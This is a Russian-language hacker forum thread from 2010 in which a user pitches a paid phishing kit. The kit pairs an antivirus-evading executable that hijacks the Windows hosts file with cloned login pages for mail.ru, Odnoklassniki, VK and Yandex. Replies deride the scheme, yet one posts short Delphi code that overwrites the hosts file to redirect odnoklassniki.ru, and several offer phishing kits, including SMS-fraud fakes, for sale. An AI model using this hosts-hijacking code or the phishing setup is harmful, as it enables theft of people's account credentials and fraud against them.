Просмотр полной версии : Оцените программу! (фейк нового покаления)
Программа в стадии разработки!
По факту это фейк нового поколения, раньше нужно было заманивать жертву на фейк огромными усилиями! В данном софте всё ГОРАЗДО ПРОЩЕ!
Описание:
1) Программа будет состоять из самого фейка и exe!
Начнём с exe:
Этот файл НЕ ПАЛИТСЯ АНТИВИРЯМИ..... При запуске этого файла конфиги в винде меняются... и чел который заходит на mail.ru попадает на ваш фейк, а в браузере пишется что он на mail.ru XD
Плюсы использования этого файла:
1) Вы ВСЕГДА будете знать пароль и логин жертвы... (поможет избавится от этого только специалист или переустановка Windows)
2) СКРИПТ НЕ ПАЛИТСЯ И НЕ БУДЕТ ПАЛИТСЯ антивирусами! (Если это произойдёт, винда просто перестанет работать)
и многое другое!
Перейдём к самому фейку:
1) Имеются фейки: mail.ru, odnoklassniki.ru, VK, yandex, rambler.ru (при покупки даются 2 фейка на выбор, последующие 10$ за штуку, изготовление фейка 20$)
2) Фейк выполнен ТОЧНОЙ копией главной страницы, жертва фактически не может ничего заподозрить!
3) Продумывается удобная админка....
4) При вводе в фейке данных, жертва переносится в её (настоящий) личный кабинет (почту и т.п.)
Цена за такое счастье фейкера будет примерно от 100-150$
ЗЫ: "Прога" будет полностью готова через 2-3 недели!
Критикуем!)
СЕЙЧАС ПРОГРАММА НЕ ПРОДАЁТСЯ!!! (она в разработке)
При входе на этот сайт у пользователей (у жертв) будет прописываться в винде пару строк- и теперь когда например человек вбивает в адресную строку (Например) mail.ru, то человек АВТОМАТИЧЕСКИ ПЕРЕХОДИТ НА ВАШ ФЕЙК
Это впечатляет!
snipero4ek
09.02.2010, 19:39
т.е hosts будет меняться при входе на сайт?
Это задумки... половину этих задумок мы с напарником уже выполнили! в частности:
При входе на этот сайт у пользователей (у жертв) будет прописываться в винде пару строк- и теперь когда например человек вбивает в адресную строку (Например) mail.ru, то человек АВТОМАТИЧЕСКИ ПЕРЕХОДИТ НА ВАШ ФЕЙК
PS: Не пишим что я кидалово и т.п... если все задумки воплотятся- пройду проверку у модеров (гарантов)!
Осталось совсем малость)!
цена такой полове бан %)
Пожалуйста ещё раз и по русски!)
Оцените программу!
Моя оценка выше, не понимаеш, пропиши в поиске онлайн переводчик и переведи.
total90 автор даже не знает где находится файл hosts в окнах, а ты спрашиваеш исходники :rolleyes:
в общем ф топку...
у тебя есть исходники винды?
Отвечу позже на ваш вопрос! т.к. я не по этому делу (мой напарник занимается видой и скриптом, я по фейкам)
h(f)ucker
09.02.2010, 19:53
Масштабы действий впечатляют....
и многое другое!
ОГо! Ничего себе!
собрались инторнет сломать?
P.s. ну какое к черту новое покАление...
Оцените программу!
Моя оценка выше, не понимаеш, пропиши в поиске онлайн переводчик и переведи.
total90 автор даже не знает где находится файл hosts в окнах, а ты спрашиваеш исходники :rolleyes:
в общем ф топку...
мой напарник занимается видой и скриптом, я по фейкам
Это видите?
Тип такого? (http://www.gfs-team.ru/articles/read/284)
Немного допилить напильником и будет то, что ты описал.
Тип такого? (http://www.gfs-team.ru/articles/read/284)
Немного допилить напильником и будет то, что ты описал.
Я эту статью первый раз вижу))) ну да что то типа такого... но то что мы делаем будет гораздо проще в использовании!
PS: и схема работы у нашего продукта совершенно другая!
wildshaman
09.02.2010, 21:48
При входе на этот сайт у пользователей (у жертв) будет прописываться в винде пару строк
Сплойт со 100% пробивом?
Наивные
1) Все наши секреты рассказывать не будем!
2) Точно не сплойт)
wildshaman
09.02.2010, 21:53
Лолы, ну вы же понимаете, что такое делается только через сплойт, а пробив даже на полном зиродее больше 50% вряд ли будет?
Лолы, ну вы же понимаете, что такое делается только через сплойт, а пробив даже на полном зиродее больше 50% вряд ли будет?
зачем ты ему объясняешь?
Он через 2 недели пропадет.
ТС, можно аську твоего "напарника" в пм?
1) Все наши секреты рассказывать не будем!
Может вы и правы, но если софт не будет работать, мы его продавать не будем!
A_n_d_r_e_i
09.02.2010, 21:56
что оценивать-то?
что оценивать-то?
Функционал программы (по описанию), и взяли бы Вы за такую цену данный софт?
софт не будет работать, мы его продавать не будем!
Поправь сообщения,как у меня в тегах цитирования.
A_n_d_r_e_i
09.02.2010, 22:06
Функционал программы (по описанию), и взяли бы Вы за такую цену данный софт?
ты Гендольф?
wildshaman
09.02.2010, 22:18
Оке, отпишите мне в ПМ приницп "смены пары строк в файлах при заходе на страничку" и я публично отпишу, какой я незнающий мудак :(
Сорри ребят... чёт я буранул со скриптом... XD .exe файл поменяет.... хотя скрипт тоже может, но палевность антивиря высокая!
wildshaman
09.02.2010, 22:30
Ололо
Ололо
XXXXDDDDD
Беспалевный джойнер будет прилагаться ! или мы сами склеим файлы....
ладно- поприкалывались и хватит, я так думаю ТС это вычитал отсюда http://forum.antichat.ru/thread164577.html и ему кажеться что он изобрел крякер инета)))
И надо отдать должное- в той теме на которую дал ссылку ТС не собирался бпрыжить фейком нового поколения)))
Программа в стадии разработки!
Цена за такое счастье фейкера будет примерно от 100-150$
(она в разработке)
Ну что- указать реквизиты своего кошелька?))) ведь я вам секономил кучу времени и бабок))
Это совершенно не то.. (я про ту ссылку которую вы дали)
И в преть прошу не обзывать меня барыгой и что я барыжу! окей? Статью я ту первый раз вижу... Всё придумано моим напарником и мной! Если кто то уже такое придумал... Хм) Отлично будем изобретать велосипед! Спросите зачем? Вспомните старые велосипеды на картинках) и новые) есть разница?
Ну единтсвенно прописывает локальную прокси и ждёт строку:
<form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth" style="overflow: hidden;">
Это совершенно не то.. (я про ту ссылку которую вы дали)
И в преть прошу не обзывать меня барыгой и что я барыжу! окей?
для начала я никого не оскарблял- и барыгой не называл, тебе стало интересно будут ли у тебя покупать данное чудо или нет (даже цену уже придумал,), хотя для начала необходимо создать софт и его опробовать, насчет что это совершенно не то.....скажу тебе по секрету- единственное чем можно добиться описанного тобой результата- это правкой файла hosts а как организованно это в той теме на которую я дал ссыль- здесь не велосипед а самокат получиться- если идти другим путем , еще раз говорю что обидеть никого нехотел, просто создание данной темы был не лучший вариант, схема должна быть такая: Придумал-реализовал-опробовал, если все идет как задумывал можеш продавать а не так что типа подождите пару недель)))
Окей спасибо за совет) Прислушаюсь! Можешь темку закрыть или удалить!
PS: Вот что я хотел услышать)
Я под столом =) 100-150$ за вот это:
Берите на халяву, антивирь курит.
Вот допустим на Delphi такая штука
(могут быть ошибки писал прямо тут)
program hosts
uses windows;
procedure feik();
var
f:textfile;
begin
assignfile(f,"C:\Windows\system32\drivers\ect\hosts");
rewrite(f);
write(f,"127.0.0.1 odnoklassniki.ru");
write(f,"127.0.0.1 www.odnoklassniki.ru");
closefile(f);
end;
begin
feik();
end.
Для того что бы это использовать нужен хостинг с выделиным IP, на который перенаправляем запросы домена odnoklassniki.ru.
Выделеный IP стоит дороже чем простой хостинг и еще Вас спалят через неделю, и плакали ваши денюжки, потому что фейки запрешенны на простых хостингах.
Так же скажу что с mail.ru такая штука не прокатить потому что если у человека установлен Magent то он выдаст сообщение что файл хостс не правельный и исправит его. (проверил лично)
Если кому надо такую прогу + фейки (также фейки которы просят отправить смс при входе)+информация о том как все это настроить и не покупать выделенный IP и не боятся за бан на хостинге пишите в ЛС.
Цена: "Договоримся".
Мде.. Программа просто правит файл hosts, ТС, есть полно подробных статей как это сделать + готовые фейки
Всё я реально тупанул!!! XDDD
Переименуйте тему в тупость нового поколения.
XakeR96!
12.02.2010, 14:42
Так я и думал, что так все закончится!
Тс убейся. Зачем опять барыжить hosts вирусом?
И за такие цены. Тс сумащедший.
http://forum.antichat.ru/thread169632.html - можно сказать что исходники :)
Тс убейся. Зачем опять барыжить hosts вирусом?
И за такие цены. Тс сумащедший.
http://forum.antichat.ru/thread169632.html - можно сказать что исходники :)
Моё добро! Но есть и более хорошие решения, но не для всех...
http://s47.radikal.ru/i117/1002/4f/69e3bb7990b1x.jpg
Antoha-RaND
14.02.2010, 10:38
Мда, я такую вещь за 30 минут сделал=) Кому надо пишите в личку, скину исходник:)
Мда, я такую вещь за 30 минут сделал=) Кому надо пишите в личку, скину исходник:)
Скинь линк в ПМ на сорц. Потом я тебе объясню что ты сделал за 30 мин
GhostOnline
25.02.2010, 20:20
http://forum.xakep.ru/m_1431559/tm.htm
Изменять файл hosts это уже новое поколение?
2) СКРИПТ НЕ ПАЛИТСЯ И НЕ БУДЕТ ПАЛИТСЯ антивирусами! (Если это произойдёт, винда просто перестанет работать)
и многое другое!
У меня от этой фразы даже член встал.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot